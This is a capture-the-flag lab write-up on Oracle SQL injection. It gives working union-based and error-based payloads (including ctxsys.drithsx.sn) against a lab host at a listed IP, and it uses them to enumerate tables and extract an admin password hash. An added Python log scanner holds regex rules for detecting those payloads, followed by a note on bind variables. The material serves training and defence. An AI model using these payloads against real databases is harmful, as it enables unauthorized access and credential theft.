封神臺 (Fengshentai) Lab: Oracle Injection
阿新 • Published: 2021-09-07
Lab
In-band (union-based) injection
Confirming the injection point
http://59.63.200.79:8808/?id=1 and 1=1 # page renders normally
http://59.63.200.79:8808/?id=1 and 1=2 # page is abnormal
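Determining the number of columns
http://59.63.200.79:8808/?id=1 order by 4 # page renders normally
http://59.63.200.79:8808/?id=1 order by 5 # page is abnormal
So the query returns 4 columns.
Finding the display position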
http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar('a'),null,null from dual
This shows that the display position is column 2.
Information gathering and data extraction
# Query table names
http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar(table_name),null,null from user_tables where rownum=1
Trying each in turn gives the final list of tables: ADMIN, MD5, NEWS
# Query the column names of the ADMIN table
http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar(column_name),null,null from user_tab_columns where rownum=1 and table_name ='ADMIN'
Trying each in turn gives the columns of the ADMIN table: UPASS, UNAME
# Query the data
The hint says the flag is the UPASS value of the row where UNAME='NF', so we query it directly:
http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar(UPASS),null,null from ADMIN where UNAME='NF'
Final flag: 2a61f8bcfe7535eadcfa69eb4406ceb9
Error-based injection
Querying table names
and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))-- qwe
and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name <> 'ADMIN'))-- qwe
and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name <> 'ADMIN' and table_name != 'NEWS'))-- qwe
Table names obtained: ADMIN, NEWS, MD5
Querying the column names of the ADMIN table
and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1 and table_name = 'ADMIN'))-- qwe
and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1 and table_name = 'ADMIN' and column_name != 'UNAME'))-- qwe
ADMIN table columns obtained: UNAME, UPASS
Querying the data
http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(1,(select UPASS from ADMIN where UNAME='NF'))-- qwe
Flag obtained: 2a61f8bcfe7535eadcfa69eb4406ceb9
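
From the defender's side, every request in this walkthrough leaves a recognisable shape in the web server's access log. The following is an added example, not part of the original post: a small log scanner that flags those shapes in the id parameter. The rule names, the combined-log-format assumption, the assumption that a legitimate id is a plain integer, and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Rules mirror the request shapes in this walkthrough: boolean probe, column
# count probe, union read, data-dictionary views, error-raising function.
RULES = [
    ("boolean_probe", re.compile(r"\band\s+\d+\s*=\s*\d+\b", re.I)),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+\b", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("dict_view", re.compile(r"\buser_(?:tables|tab_columns)\b", re.I)),
    ("error_function", re.compile(r"\bctxsys\s*\.\s*drithsx\s*\.\s*sn\s*\(", re.I)),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def classify(target, param="id"):
    """Return sorted rule names matching the URL-decoded value of `param`."""
    hits = set()
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, [])
    for value in values:
        if re.fullmatch(r"[0-9]+", value):
            continue  # assumption: a legitimate id is a plain integer
        hits.add("non_numeric_id")
        hits.update(name for name, rx in RULES if rx.search(value))
    return sorted(hits)

def scan(log_lines):
    """Return (client, hits) for every access-log line with at least one hit."""
    findings = []
    for line in log_lines:
        m = REQUEST.match(line)
        if m and (hits := classify(m.group(2))):
            findings.append((m.group(1), hits))
    return findings

# Constructed sample lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Sep/2021:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [07/Sep/2021:10:00:02 +0000] "GET /?id=1%20and%201=2 HTTP/1.1" 200 90',
    '203.0.113.9 - - [07/Sep/2021:10:00:03 +0000] "GET /?id=1%20order%20by%205 HTTP/1.1" 200 90',
    '203.0.113.9 - - [07/Sep/2021:10:00:04 +0000] "GET /?id=1%20and%201=2%20union%20all%20select%20null,to_nchar(table_name),null,null%20from%20user_tables%20where%20rownum=1 HTTP/1.1" 200 530',
    '203.0.113.9 - - [07/Sep/2021:10:00:05 +0000] "GET /?id=1%20and%201=ctxsys.drithsx.sn(1,(select%20table_name%20from%20user_tables%20where%20rownum=1))--%20qwe HTTP/1.1" 200 410',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, hits)
```

Log matching only flags the request shapes shown on this page; the underlying fix is to pass id to Oracle as a numeric bind variable instead of concatenating it into the SQL text.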